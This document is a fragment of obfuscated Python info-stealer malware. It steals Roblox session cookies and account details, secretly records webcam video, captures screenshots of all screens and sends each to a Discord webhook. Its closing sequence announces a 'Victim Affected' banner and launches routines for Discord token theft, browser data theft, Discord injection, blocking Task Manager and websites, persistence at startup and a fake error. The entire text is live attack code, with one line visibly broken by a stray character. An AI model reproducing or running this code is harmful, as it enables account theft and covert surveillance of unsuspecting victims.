                LSGCNLRKRVPNJHUZRCYLJTSAAIPLFPWBSVSGSCRXMHVQPLKKZYCMZPLYUZBACQVZRTDDUHVHEW = v4r_c00ki3[MRJSPBIHOMTSKSDYXYVYEJCBNKROYQFCGZBUTGVBPGFMRSLXIGPNETTWZBI:]

                OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)

                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH = discord.Embed(
                    title=f'Roblox Cookie `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:',
                    color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR
                )
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_thumbnail(url=CCHUQTJYNLMPBWECFFWCBIWVSLBPSBKTQSDNWTKURYYLCZMXDTYGVNGGPYZBTTMSK)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":compass: Navigator:", value=f"```{v4r_n4vigator}```", inline=True)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":bust_in_silhouette: Username:", value=f"```{BPHKCCJGRZRNTKANWLIAOLQRJMMGBVIPAWTZSQBTENLMTFNPUXLBW}```", inline=True)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":bust_in_silhouette: DisplayName:", value=f"```{ZKYEADYOWLQVHRPOZTBEASMIDJALJVEHWHILZOAXVMVIAVXKMVJLHQTQMTQRJKTKZORKSBTLPVEYP}```", inline=True)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":robot: Id:", value=f"```{GFOEXXCFWAZWMKWWGEUHLOAUZXAOBDOATNVEKQXTCQHOYRBZILAFLXR}```", inline=True)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":moneybag: Robux:", value=f"```{QPNOZPMWHGWYZJOXPXZFWDJTLDABRIQWEFJHTOVOTMTMIIJPNPZVIHYEFOLRTRGXOYKBDVLFOVWKQBEFYVOOFFMXRGAD}```", inline=True)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":tickets: Premium:", value=f"```{QATMQTZLZEGZYOOMEKZCFGOLMKSEOUCTQRNNGBWPPEAVXUBOJAQNYBJPULOETXBLIIHNHCVNYNBHMFRNLEHZPHTMOPPJCROCPR}```", inline=True)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":construction_site: Builders Club:", value=f"```{TUJNKQRALZDOWLBFKGNAMWCJBZLWNVHAWHUQKTHTEMOEOZNXHDXMEOLTODOPFWSOLCKBEABC}```", inline=True)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":cookie: Cookie Part 1:", value=f"```{QHAOMFXERKCXTTLAGXPJWRZJNATMZOFLMZGOHEPBBBNZHRABRWKLVPFBFXKU}```", inline=False)
                DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.add_field(name=":cookie: Cookie Part 2:", value=f"```{LSGCNLRKRVPNJHUZRCYLJTSAAIPLFPWBSVSGSCRXMHVQPLKKZYCMZPLYUZBACQVZRTDDUHVHEW}```", inline=False)

                OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(embed=DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH, username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ,
                                avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
                
    if not BSULAGYSRHRDPPCSNNVNUDKJOTZTACHPDRNUYIAQIIKGXQVYKIEKFVSAFSXCUWIJNGVPPJ:
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)
        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH = Embed(
            title=f'Roblox Cookie `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:', 
            description=f"No roblox cookie found.",
            color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR)
        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(embed=DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH, username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)

def C4m3r4_C4ptur3():
    import os
    import cv2
    from discord import SyncWebhook, Embed, File
    from datetime import datetime

    try:
        from datetime import datetime
        IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_capture = f"CameraCapture_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.avi"
        ENYTHEJQSNPLRAQNGIXPRTPIMRLDVVSZNXFSFGVRNBAHVLDGQOILLWLZDVSX = 10
        HQNWAJMKFXVQZKVQGTRKYHQABJBBHPGRQJQBANTUYRWPVARGDNNLOEG = cv2.VideoCapture(0)

        if not HQNWAJMKFXVQZKVQGTRKYHQABJBBHPGRQJQBANTUYRWPVARGDNNLOEG.isOpened():
            Clear()
            OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)
            DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH = Embed(
                title=f'Camera Capture `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:', 
                description=f"No camera found.",
                color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR)
            DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
            OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(embed=DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH, username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
            return

        def c4ptur3(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture):
            v4r_fourcc = cv2.VideoWriter_fourcc(*'XVID')
            v4r_out = cv2.VideoWriter(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture, v4r_fourcc, 20.0, (640, 480))
            v4r_time_start = datetime.now()
            Clear()
            while (datetime.now() - v4r_time_start).seconds < ENYTHEJQSNPLRAQNGIXPRTPIMRLDVVSZNXFSFGVRNBAHVLDGQOILLWLZDVSX:
                Clear()
                v4r_ret, v4r_frame = HQNWAJMKFXVQZKVQGTRKYHQABJBBHPGRQJQBANTUYRWPVARGDNNLOEG.read()
                if not v4r_ret:
                    Clear()
                    break
                v4r_out.write(v4r_frame)

            HQNWAJMKFXVQZKVQGTRKYHQABJBBHPGRQJQBANTUYRWPVARGDNNLOEG.release()
            v4r_out.release()
            Clear()

        try:
            ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture = f"{os.path.join(os.environ.get('USERPROFILE'), 'Documents')}\\{IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_capture}"
            c4ptur3(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture)
        except:
            ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture = IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_capture
            c4ptur3(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture)

        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH = Embed(title=f"Camera Capture `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} \"{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}\"`:", color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR, description=f"```└── 📷 - {IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_capture}```")
        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)

        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)
        with open(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture, "rb") as f:
            OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(
                embed=DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH,
                file=File(f, filename=IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_capture),
                username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ,
                avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW
            )
            
        if os.path.exists(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture):
            os.remove(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_capture)
        Clear()
    except:
        Clear()
        pass

def Scr33n5h0t():
    import os
    from PIL import ImageGrab
    from discord import SyncWebhook, Embed, File

    try:
        IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_screen = f"Screenshot_{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM}.png"

        def capture(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
            v4r_image = ImageGrab.grab(
                bbox=None,
                include_layered_windows=False,
                all_screens=True,
                xdisplay=None
            )
            v4r_image.save(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT)
        
        try:
            ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_screen = f"{os.path.join(os.environ.get('USERPROFILE'), 'Documents')}\\{IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_screen}"
            capture(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_screen)
        except:
            ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_screen = IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_screen
            capture(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_screen)

        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH = Embed(title=f"Screenshot `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} \"{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}\"`:", color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR)
        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_image(url=f"attachment://{IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_screen}")
        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW )
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(
               y embed=DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH,
                file=File(f'{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_screen}', filename=IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS_file_screen),
                username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ,
                avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW
            )

        if os.path.exists(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_screen):
            os.remove(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT_file_screen)
    except Exception as e:
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)
        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH = Embed(
            title=f'Screenshot `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:', 
            description=f"Impossible to take screenshot.\n**Error:** `{e}`",
            color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR)
        DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(embed=DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH, username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)

try: requests.post(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, 'avatar_url': BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY, json={'content': f'****╚══════════════════{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}══════════════════╝****', 'username': IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, 'avatar_url': BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
